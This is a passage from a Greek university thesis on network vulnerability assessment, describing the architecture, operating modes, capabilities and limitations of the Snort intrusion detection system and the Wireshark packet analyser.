συστήματος και πολλά άλλα. Το εργαλείο είναι διαθέσιμο από την ιστοσελίδα

http://www.snort.org/.

Το Snort αποτελείται από δύο κύρια συστατικά:

• μια μηχανή ανίχνευσης η οποία χρησιμοποιεί μια αρθρωτή αρχιτεκτονική από plugin και

καλείται “Snort Engine”

• μια ευέλικτη γλώσσα κανόνων που χρησιμοποιείται για την περιγραφή της κυκλοφορίας

η οποία θα συλλεχθεί και καλείται “Snort Rules”.

Το Snort λειτουργεί τόσο σε περιβάλλοντα Windows όσο και σε περιβάλλοντα Linux, ενώ η

Snort Engine κατανέμεται σε πηγαίο κώδικα και σε binaries. Η Snort Engine και Snort Rules

διανέμονται ξεχωριστά. Το αρχείο κανόνων (Rules) του Snort πρέπει να ενημερώνεται

τακτικά αφού συνεχώς προστίθενται νέοι κανόνες, αν και οι δωρεάν ενημερώσεις φτάνουν

με τριάντα ημέρες καθυστέρηση στους χρήστες σε σχέση με το εμπορικό κομμάτι.

Το Snort για να λειτουργήσει απαιτεί την ύπαρξη κάποιων πακέτων λογισμικού και

συγκεκριμένα για το Linux τα:

• Libpcap

• PCRE

• Libnet

• Barnyard

Για περιβάλλον Windows χρειάζονται μόνο το

• WinPcap

• Barnyard

Page 185: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

185 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Μπορεί να λειτουργεί σε μία από τις ακόλουθες καταστάσεις:

• Sniffer: Συλλαμβάνει τα πακέτα που διακινούνται στο δίκτυο και τα προβάλει στην

οθόνη σε πραγματικό χρόνο

• Packet Logger: Καταγράφει τα πακέτα που διακινούνται στο δίκτυο, για περαιτέρω

επεξεργασία από τους αναλυτές.

• Network Intrusion Detection System (NIDS): Αναλύεται η κίνηση στο δίκτυο

προκειμένου να γίνουν αντιστοιχίσεις με τους κανόνες που έχουν θέσει οι αρμόδιοι της

Ασφάλειας τους δικτύου και πραγματοποιεί διάφορες ενέργειες οι οποίες βασίζονται στις

καταγραφές του. Κάθε φορά που ένα πακέτο παραβιάζει κάποιον κανόνα, δημιουργείται

μήνυμα ελέγχου στην οθόνη το οποίο σχετίζεται με τον κανόνα που παραβιάστηκε

συνοδευόμενο από τα επιπρόσθετα στοιχεία του πακέτου.

• Inline: Τα πακέτα λαμβάνονται με χρήση iptables και όχι από το libpcap. Στη συνέχεια

χρησιμοποιούνται νέοι τύποι κανόνων με σκοπό να περάσουν ή να απορριφθούν πακέτα

με χρήση iptables και κανόνες του Snort.

Το Snort δεν διαθέτει γραφικό περιβάλλον και όλες οι ρυθμίσεις και επιλογές

πραγματοποιούνται από τη γραμμή εντολών. Υπάρχουν όμως άλλες εφαρμογές οι οποίες

μπορούν να συνεργαστούν με το Snort και να παρουσιάσουν τις καταγραφές του σε ένα

γραφικό περιβάλλον με δυνατότητες δημιουργίας αναφορών, πχ η Base.

4.11.2 Δυνατότητες

Οι κυριότερες δυνατότητες του Snort μπορούν να συνοψιστούν στα παρακάτω:

• Συλλαμβάνει τα πακέτα που διακινούνται στο δίκτυο και τα προβάλει στην οθόνη σε

πραγματικό χρόνο.

• Καταγράφει τα πακέτα που διακινούνται στο δίκτυο για μετέπειτα επεξεργασία.

• Πραγματοποιεί ανίχνευση και καταγραφή των εισβολών, ενώ ταυτόχρονα παράγει

μηνύματα ενημέρωσης (Alerts) προς το διαχειριστή του δικτύου. Οι επιθέσεις και οι

προτροπές που μπορεί να ανιχνεύσει είναι μεταξύ άλλων:

o Μεγάλος όγκος πακέτων (buffer overflows) που μπορεί να οδηγήσει σε Denial of

Service

o κρυφές (stealth) σαρώσεις θυρών

o επιθέσεις CGI (Common Gateway Interface)

o προτροπές SMB (Server Message Block)

o προσπάθειες ανίχνευσης λειτουργικού συστήματος (OS fingerprinting)

Page 186: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

186 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

o ιομορφικό λογισμικό (backdoors, spywares)

o απειλές από εφαρμογές peer-to-peer

• Πραγματοποιεί αναζήτηση/ταίριασμα περιεχομένου στα πακέτα που διακινούνται και

μπορεί να χρησιμοποιηθεί για το φιλτράρισμά τους με αποτέλεσμα να απορρίπτει πακέτα

τα οποία μπορούν να βλάψουν την ασφάλεια του πληροφοριακού συστήματος ή να

παραβιάσουν την πολιτική ασφάλειας του οργανισμού.

• Παρακολουθεί την κίνηση του δικτύου ανά υπολογιστή και εντοπίζει περιπτώσεις χρήσης

μεγάλου εύρους ζώνης (bandwidth).

• Πραγματοποιεί ανάλυση πρωτοκόλλων.

• Είναι πλήρως παραμετροποιήσιμο, αφού αφενός συνεργάζεται με Windows και Linux

συστήματα και αφετέρου επιτρέπει την προσαρμογή των κανόνων του ανάλογα με το

λειτουργικό σύστημα, την πολιτική ασφάλειας και τις ιδιαίτερες ανάγκες του εκάστοτε

οργανισμού.

• Πραγματοποιεί αποθήκευση των μηνυμάτων σε μία βάση δεδομένων για περεταίρω

ανάλυση και επεξεργασία, καθώς και εξαγωγή στατιστικών συμπερασμάτων και

αναφορών με τη χρήση τρίτων εφαρμογών.

• Παρέχει υψηλό βαθμό ακρίβειας στη διαχείριση σφαλμάτων της ανίχνευσης εισβολών.

Τα σφάλματα που μπορεί να προκύψουν στην ανίχνευση εισβολών αφορούν είτε στην

ψευδή αναφορά μιας επίθεσης, είτε στη μη ανίχνευση μιας εισβολής. Τα σφάλματα αυτά

μπορούν να μειώσουν την αξιοπιστία ενός συστήματος ανίχνευσης εισβολών. Το Snort,

όμως, μέσω των κανόνων του παρέχει ικανοποιητικό βαθμό αξιοπιστίας.

• Μέσω της γλώσσας προγραμματισμού που διαθέτει η Snort Rules Engine επιτρέπει τη

δημιουργία πρόσθετων κανόνων σύμφωνα με τις ιδιαίτερες απαιτήσεις διαμόρφωσης της

ασφάλειας κάθε δικτύου

4.11.3 Περιορισμοί και παρενέργειες

Το Snort εκτός από τις δυνατότητες έχει περιορισμούς και παρενέργειες, οι κυριότερες εκ

των οποίων είναι οι εξής:

• Επειδή το Snort δουλεύει σε επίπεδο δικτύου, δηλαδή κοιτάζει ΙΡ διευθύνσεις, δεν

διαθέτει κανόνες και δεν μπορεί να εντοπίσει πάντα επιθέσεις τύπου Man In the Middle,

πλαστοπροσωπίας και ανακατεύθυνσης πακέτων οι οποίες χρησιμοποιούν τις MAC

διευθύνσεις των υπολογιστών για την πραγματοποίηση αυτών των επιθέσεων.

• Δεν αντιμετωπίζει περιστατικά ασφάλειας. Εστιάζει μόνο στην ανίχνευσή τους.

Page 187: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

187 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Λειτουργεί καλά για δίκτυα μικρής έκτασης αλλά σε περιπτώσεις μεγάλων δικτύων

(όπως το Gigabit Ethernet) έχει υψηλό βαθμό αναξιοπιστίας.

• Το περιβάλλον διεπαφής τους δεν είναι ιδιαίτερα φιλικό προς το χρήστη (κυρίως για το

χρήστη Windows εφαρμογών) και επιπλέον, για την παραγωγή φιλικών αναφορών

απαιτείται η εγκατάσταση πρόσθετων προγραμμάτων.

• Το πλήθος των δεδομένων που παράγει κάθε φορά είναι μεγάλο και η επεξεργασία τους

απαιτεί εξειδικευμένες γνώσεις.

• Η εγκατάσταση δεν είναι ιδιαίτερα φιλική προς το χρήστη και προϋποθέτει την

εγκατάσταση και παραμετροποίηση αρκετών άλλων εφαρμογών.

• Κατά το χρόνο εκκίνησης της εφαρμογής παρατηρούνται καθυστερήσεις λόγω της

δυναμικής φόρτωσης βιβλιοθηκών που υπερβαίνουν τα όρια του ανεκτού.

• Η παραμετροποίηση του πρέπει να γίνεται προσεκτικά γιατί μπορεί να οδηγήσει είτε σε

ένα πολύ αυστηρό, είτε σε ένα πολύ χαλαρό περιβάλλον ασφάλειας.

4.11.4 Αρχιτεκτονική και τρόπος λειτουργίας

Το Snort όπως φαίνεται και στο επόμενο σχήμα αποτελείται από τρία επιμέρους

υποσυστήματα:

• Τον αποκωδικοποιητή που λαμβάνει τα πακέτα και προσθέτει δείκτες για τις κρίσιμες

περιοχές δεδομένων:

o Ethernet header

o IP header

o TCP header

o Payload

• Τους προεπεξεργαστές (Preprocessors) οι οποίοι κάνουν ένα η περισσότερα από τα εξής:

o Παρέχουν ανίχνευση για επιθέσεις και δραστηριότητες οι οποίες δεν μπορούν να

πραγματοποιηθούν από τους πρότυπους κανόνες του snort

o Παρέχουν υπηρεσίες εξομάλυνσης ώστε τα δεδομένα να εμφανίζονται σε μια

προτυποποιημένη μορφή (format)

o Παρέχουν υπηρεσίες reassembly έτσι ώστε η ανίχνευση να πραγματοποιηθεί σε σχέση

με το πλήρες μήνυμα

• Τη μηχανή ανίχνευσης η ο πο ία περιέχει τους κανόνες και στην ο πο ία προωθούνται τα

πακέτα για ανάλυση

Page 188: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

188 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 4.27: Αρχιτεκτονική του Snort

Πηγή: http://assets.sourcefire.com/snort/vrtwhitepapers/performance_rules_creation_1.pdf

Η παραμετροποίηση του προγράμματος και η ανάλυση των κανόνων γίνονται πριν ξεκινήσει

η παρακολούθηση των πακέτων, έτσι ώστε να διατηρείται σε χαμηλά επίπεδα η επιβάρυνση

του συστήματος από την ανάλυση κάθε πακέτου.

Η σύνταξη των κανόνων του Snort είναι απλή και προσφέρει μεγάλη ευελιξία ώστε να

μπορούν να ανιχνευθούν πολλά και διαφορετικά είδη απειλών. Οι κανόνες του snort είναι

οργανωμένοι σε αρχεία ανάλογα με το είδος της απειλής που αναγνωρίζουν. Υπάρχουν τρεις

βασικές ενέργειες που μπορεί να κάνει το snort, όταν η ανάλυση ενός πακέτου ταιριάξει με

κάποιον κανόνα:

• Pass: το πακέτο επιτρέπεται να περάσει.

• Log: το πακέτο καταγράφεται.

• Alert: εμφανίζει μια ειδοποίηση χρησιμοποιώντας τη μέθοδο που έχει ορίσει ο χρήστης

και στη συνέχεια καταγράφει το πακέτο.

Page 189: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

189 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 4.28: Κονσόλα λειτουργίας του Snort

Αφού εγκατασταθεί το Snort σε ένα πληροφοριακό σύστημα θα πρέπει να γίνει η

παραμετροποίηση του σύμφωνα με τις ενέργειες που θέλει ο χρήστης να πραγματοποιεί. Για

περισσότερες λεπτομέρειες σχετικά με την παραμετροποίηση και τη συγγραφή κανόνων ο

αναγνώστης παραπέμπεται στο εγχειρίδιο χρήσης της εφαρμογής.

Τα αποτελέσματα των ανιχνεύσεων και των καταγραφών μπορούν να εμφανιστούν στο

χρήστη είτε με χρήση ενός φυλλομετρητή, όπου πληκτρολογεί localhost/base, είτε με τη

χρήση ενός άλλου προγράμματος εμφάνισης αναφορών.

Page 190: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

190 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

Εικόνα 4.29: Γραφικό περιβάλλον εμφάνισης των αποτελεσμάτων του Snort

Page 191: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

191 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.12 Wireshark

4.12.1 Ταυτότητα

Το Wireshark είναι ένα ανοιχτού κώδικα, λογισμικό ανάλυσης πακέτων δικτύου το οποίο

διατίθεται δωρεάν μέσω της ιστοσελίδας http://www.wireshark.org/. Η λειτουργία του

έγκειται στη σύλληψη πακέτων που διακινούνται σε ένα δίκτυο και η εμφάνιση των

δεδομένων που περιέχουν με όσο το δυνατό πιο αναλυτικό τρόπο. Χρησιμοποιείται κυρίως

από:

• διαχειριστές δικτύου για την επίλυση δικτυακών προβλημάτων

• μηχανικούς ασφάλειας δικτύων για την εξέταση προβλημάτων ασφάλειας

• προγραμματιστές για την αποσφαλμάτωση στις υλοποιήσεις πρωτοκόλλων

• απλούς χρήστες για την μελέτη της εσωτερική λειτουργία του δικτυακού πρωτοκόλλου

• επιτιθέμενους για την υποκλοπή προσωπικών πληροφοριών ή την εκτέλεση άλλων

κακόβουλων ενεργειών.

Το Wireshark εγκαθίσταται σε κάποιον υπολογιστή του δικτύου και, ως λογισμικό ανάλυσης

πακέτων δικτύου, μπορεί να καταγράφει αλλά και να αποκωδικοποιεί τα διερχόμενα πακέτα

σε πραγματικό χρόνο. Αποσκοπεί στην αναγνώριση της ταυτότητας των χρηστών, την

καταγραφή και αναγνώριση των ωρών αιχμής για τη χρήση του δικτύου, τον εντο πισμό

πιθανών επιθέσεων ή λειτουργίας κακόβουλου λογισμικού, την εύρεση μη ασφαλών

εφαρμογών που εκτελούνται στα πλαίσια του δικτύου αλλά και την αποσφαλμάτωση άλλων

εφαρμογών. Δεν λειτουργεί σαν σύστημα ανίχνευσης εισβολών και δεν διαχειρίζεται

στοιχεία του δικτύου.

Το πρόγραμμα αναπτύχθηκε από έναν διαχειριστή δικτύου, τον Gerald Combs, για να

εντοπίζει προβλήματα σε ένα δίκτυο. Εξ’ αρχής ήταν ένας παθητικός αναγνώστης των

πακέτων του δικτύου· δεν μπορεί δηλαδή να παρέμβει στο περιεχόμενό τους. Ωστόσο, ως

λογισμικό ανοιχτού κώδικα, παρέχει τη δυνατότητα στον οποιονδήποτε να αναπτύξει

πρόσθετα στοιχεία (components), τα οποία του επιτρέπουν να παραποιήσει ή να εισάγει

δεδομένα στο δίκτυο.

Το Wireshark είναι συμβατό τόσο με Windows όσο και Unix/Linux εφαρμογές.

Συγκεκριμένα υποστηρίζει:

• Windows XP Home, XP Pro, XP Tablet PC, XP Media Center, Server 2003, Vista, 2008,

7, ή 2008 R2

Page 192: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

192 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Apple Mac OS X, Debian GNU/Linux, FreeBSD, Gentoo Linux, HP-UX, Mandriva

Linux, NetBSD, OpenPKG, Red Hat Fedora/Enterprise Linux, rPath Linux, Sun

Solaris/i386, Sun Solaris/Sparc, Canonical Ubuntu.

Εάν για κάποια πλατφόρμα δεν υπάρχει πρόγραμμα εγκατάστασης, το Wireshark διαθέτει

δωρεάν τον πηγαίο κώδικα, οπότε ο ενδιαφερόμενος μπορεί να δημιουργήσει το δικό του

αρχείο εγκατάστασης.

Στον επόμενο πίνακα παρουσιάζονται οι διαφορετικοί δικτυακοί τύποι που υποστηρίζονται

από το Wireshark στις διάφορες πλατφόρμες.

AIX FreeBSD HP-UX Irix Linux MacOSX NetBSD OpenBSD Solaris Tru64UNIX Windows Physical Interfaces

ATM Unknown Unknown Unknown Unknown Yes No Unknown Unknown Yes Unknown Unknown

Bluetooth No No No No Yes1 No No No No No No

CiscoHDLC Unknown Yes Unknown Unknown Yes Unknown Yes Yes Unknown Unknown Unknown

Ethernet Yes Yes Yes Yes Yes Yes Yes Yes Yes Yes Yes

FDDI Unknown Unknown Unknown Unknown Yes No Unknown Unknown Yes Unknown Unknown

FrameRelay Unknown Unknown No No Yes No Unknown Unknown No No No

IrDA No No No No Yes No No No No No No

PPP2 Unknown Unknown Unknown Unknown Yes Yes Unknown Unknown No Unknown Yes

TokenRing Yes Yes Unknown No Yes No Yes Yes Yes Unknown Yes

USB No No No No Yes3 No No No No No No

WLAN4 Unknown Yes Unknown Unknown Yes Yes Yes Yes Unknown Unknown Yes Virtual Interfaces

Loopback Unknown Yes No Unknown Yes Yes Yes Yes No Yes N/A5

VLAN Tags Yes Yes Yes Unknown Yes Yes Yes Yes Yes Yes Yes 1. Linux Affix Bluetooth stack only. 2. PPP non-control frames only. 3. Latest libpcap CVS required (which exact version?). 4. On some platforms: WLAN non-control frames only, with fake Ethernet headers, and only traffic to and from the machine doing the

capturing. 5. Windows does not have a UNIX-style loopback interface.

Πίνακας 4-5: Δικτυακοί τύποι που υποστηρίζονται από το Wireshark Πηγή: http://wiki.wireshark.org/CaptureSetup/NetworkMedia

Επιπλέον το Wireshark συνεργάζεται με άλλες εφαρμογές σύλληψης πακέτων επιτρέποντας

την εισαγωγή και εξαγωγή αρχείων από και προς αυτές.

Το γραφικό περιβάλλον που διαθέτει επιτρέπει την εύκολη ανάλυση των δεδομένων που

συλλέγονται.

Page 193: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

193 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

4.12.2 Δυνατότητες

Το Wireshark προσφέρει στον χρήστη μια σειρά από δυνατότητες:

• Μπορεί να λειτουργήσει σε δύο καταστάσεις: promiscuous και non promiscuous. Αυτό

σημαίνει ότι μπορεί να παρακολουθεί είτε την επικοινωνία μεταξύ όλων των

υπολογιστών του δικτύου (promiscuous mode) είτε αυτή μεταξύ του υπολογιστή στον

οποίο είναι εγκατεστημένο και του υπολοίπου δικτύου (non promiscuous mode). Βασική

προϋπόθεση για τη λειτουργία σε promiscuous mode είναι να το υποστηρίζει η κάρτα

δικτύου του υπολογιστή. Η λειτουργία σε promiscuous mode υπάρχει συνήθως σαν

δυνατότητα στις κάρτες δικτύου Ethernet, αλλά όχι για αυτές του Wi-Fi.

• Έχει τη δυνατότητα καταγραφής δεδομένων/πακέτων του δικτύου και αποθήκευσης

αυτών.

Τα πακέτα μπορούν να αποθηκευθούν σε ένα ή περισσότερα αρχεία και μπορεί να

καθοριστεί μέγιστο μέγεθος αρχείου, μέγιστο χρονικό διάστημα καταγραφής ή μέγιστος

αριθμός καταγραφόμενων πακέτων. Επίσης, το Wireskark παρέχει μια σειρά από

χρήσιμα εργαλεία για την διαχείριση πολλαπλών αρχείων καταγραφής, τα αποκαλούμενα

file sets.

• Μπορεί να αναλύσει περεταίρω τα αποθηκευμένα πακέτα του δικτύου.

• Πραγματοποιεί εις βάθος ανάλυση σε κάθε πακέτο που καταγράφει, παρουσιάζοντας

λεπτομερώς όλες τις πληροφορίες που μεταφέρει το πακέτο σε όλα τα επίπεδα ανάλυσης

του μοντέλου OSI (Από Layer 2-Data Link μέχρι Layer 7-Application).

• Διαθέτει ένα εύχρηστο και φιλικό προς το χρήστη περιβάλλον.

• Έχει πλούσιες δυνατότητες όσον αφορά τα φίλτρα που μπορούν να εφαρμοστούν στα

καταγραφόμενα πακέτα.

Τα φίλτρα καθορίζονται από τον χρήστη και με αυτά μπορεί να παρακολουθήσει πακέτα

ενός συγκεκριμένου πρωτοκόλλου μόνο, τα οποία πληρούν συγκεκριμένα

χαρακτηριστικά όπως π.χ. να έχουν μια συγκεκριμένη τιμή, να συγκρίνονται

συγκεκριμένα πεδία με άλλα μέσα στο ίδιο πακέτο, και να ελέγχουν την ύπαρξη

συγκεκριμένων πεδίων ή πρωτοκόλλων.

• Έχει τη δυνατότητα να παρακολουθήσει μια TCP συνεδρία (session) και να την

εμφανίσει ή αποθηκεύσει σε μορφή ASCII, C πινάκων, δεκαεξαδική (Hex dump) και

EBCDIC.

• Υποστηρίζει πάνω από 750 πρωτόκολλα και λόγω του γεγονότος ότι αποτελεί λογισμικό

ανοιχτού κώδικα, καινούρια components προστίθενται συνεχώς.

Page 194: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

194 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Μπορεί να αναγνωρίσει αρχεία πακέτων που έχουν καταγραφεί από 25 και πλέον

αναλυτές δικτύου που είναι διαθέσιμοι στην αγορά και μπορεί να αποθηκεύσει τα δικά

του αρχεία σε μορφές αναγνωρίσιμες από άλλα προγράμματα (libcap, Network

Associates Sniffer, NetMon και Sun snoop).

• Μπορεί να καταγράψει δεδομένα από δίκτυα διαφορετικού τύπου όπως Ethernet, Token-

Ring, 802.11 Wireless κ.ά.

• Τα αποτελέσματα ή τα στατιστικά μπορούν να αποθηκευθούν ή να εκτυπωθούν σε μορφή

απλού κειμένου ή PostScript, XML και SVC.

• Περιέχει μια ποικιλία από υποστηριζόμενα προγράμματα και components που

προσφέρουν διάφορες δυνατότητες ενώ διατίθεται και σε μορφή κονσόλας (command-

line version TShark).

Επίσης, διατίθενται plugins ή επεκτάσεις για ανάλυση περισσότερων πρωτοκόλλων

(dissector plugin), για εκτεταμένη υποστήριξη στατιστικών στοιχείων (tree statistics

plugins) και για μεγαλύτερη ανάλυση του SNMP (SNMP MIB plugin).

• Παρέχει δυνατότητα ανάλυσης VoIP.

• Υποστηρίζει μεθόδους αποκρυπτογράφησης διαφόρων πρωτοκόλλων, όπως IPsec,

Kerveros, WPA,WPA2 κ.ά.

• Συμβάλει στον εντοπισμό των παρακάτω προβλημάτων ασφάλειας:

o Εντοπισμός Spyware

o Ανίχνευση παράνομης παρείσφρησης στο δίκτυο

o Εντοπισμός εκτιθέμενου/παραβιασμένου υπολογιστή

o Επικύρωση συμμόρφωσης με την πολιτική ασφαλείας της επιχείρησης

o Εντοπισμός προέλευσης ιογενούς ή D.o.S. (Denial of Service) επίθεσης

o Εντοπισμός προβληματικών καρτών δικτύου

o Βελτιστοποίηση πολιτικών ασφαλείας για Αναχώματα Ασφάλειας

o Εντοπισμός VoIP προβλημάτων

o Προβλήματα ασφαλείας κατά τον προγραμματισμό του δικτύου

o Συγκεκαλυμμένες δικτυακές δραστηριότητες

4.12.3 Περιορισμοί και παρενέργειες

Το Wireshark έχει τους εξής περιορισμούς και παρενέργειες:

• Όταν δουλεύει σε δίκτυα με υψηλό φόρτο εργασίας έχει υψηλές απαιτήσεις σε μνήμη και

χωρητικότητα δίσκου, γι’ αυτό απαιτούνται γρήγοροι επεξεργαστές και μεγάλη

χωρητικότητα μνήμης και δίσκου.

Page 195: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

195 Ελληνικό Ανοικτό Πανεπιστήμιο: Πτυχιακή Εργασία - HOU-CS-UGP-2010-03

• Στην περίπτωση που εξαντληθεί η διαθέσιμη μνήμη στο μηχάνημα του τρέχει το

Wireshark, η εφαρμογή τερματίζεται (crash).

• Η χρήση πολυεπεξεργαστών (Multiprocessor/Hyperthread) δεν βελτιώνει την απόδοση

του Wireshark δεδομένου ότι οι χρονοβόρες διαδικασίες όπως το φιλτράρισμα πακέτων

είναι ενός νήματος.

• Οι καινούριες εκδόσεις πρέπει να εγκαθίστανται εξ’ ολοκλήρου από την αρχή.

• Δεν μπορεί να παρακολουθήσει πακέτα που ανταλλάσσει στο δίκτυο μια συγκεκριμένη

διεργασία (process). Αυτό περιορίζει την αποσφαλμάτωση προγραμμάτων τα οποία

διακινούν πακέτα στο δίκτυο.

• Δεν υπάρχει δυνατότητα καταγραφής πακέτων από δύο κάρτες δικτύου ταυτόχρονα.

• Η έλλειψη χρονοπρογραμματισμού για εκκίνηση της καταγραφής πακέτων σε

συγκεκριμένη χρονική στιγμή

• Έλλειψη δυνατότητας καταγραφής πακέτων τα οποία μεταδίδονται μέσω USB ή

Firewire.

• Έλλειψη δυνατότητας ύπαρξης “ειδοποίησης” όταν εντοπίζονται συγκεκριμένα πακέτα

μέσω κάποιου φίλτρου που έχει επιλεγεί.

• Δεν υπάρχει επιλογή συμπίεσης κατά την καταγραφή και αποθήκευση των πακέτων.

4.12.4 Αρχιτεκτονική και τρόπος λειτουργίας

Το Wireshark σαν πρόγραμμα έχει δύο βασικά components: το Wireshark GTK το οποίο

αποτελεί πρόγραμμα ανάλυσης δικτύων σε γραφικό περιβάλλον και το TShark που είναι το

ίδιο αλλά σε command line. Είναι γραμμένο σε C++. Το Wireshark χρησιμοποιεί για την

καταγραφή τις βιβλιοθήκες libcap/winpcap. Από τη χρήση αυτών των βιβλιο θηκών

προκύπτουν και κάποιοι περιορισμοί στα πρωτόκολλα και τύπους δικτύων που μπορεί να

παρακολουθηθούν με αυτό.

Το Wireshark αφού εγκατασταθεί και γίνουν οι επιθυμητές ρυθμίσεις είναι έτοιμο να αρχίσει

τη σύλληψη πακέτων. Όταν αρχίσει η καταγραφή των πακέτων το Wireshark θα τα

εμφανίσει στο γραφικό περιβάλλον του όπως φαίνεται στην επόμενη εικόνα.

Page 196: ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ …dsmc.eap.gr/downloads/PLH40-Kalabounia.pdf · ΠΡΟΓΡΑΜΜΑ ΣΠΟΥΔΩΝ ΠΛΗΡΟΦΟΡΙΚΗΣ. ΔΙΠΛΩΜΑΤΙΚΗ

Καλαμπούνια Μαρία Χριστίνα, “Έλεγχος τρωτότητας δικτυοκεντρικών Πληροφοριακών Συστημάτων ”

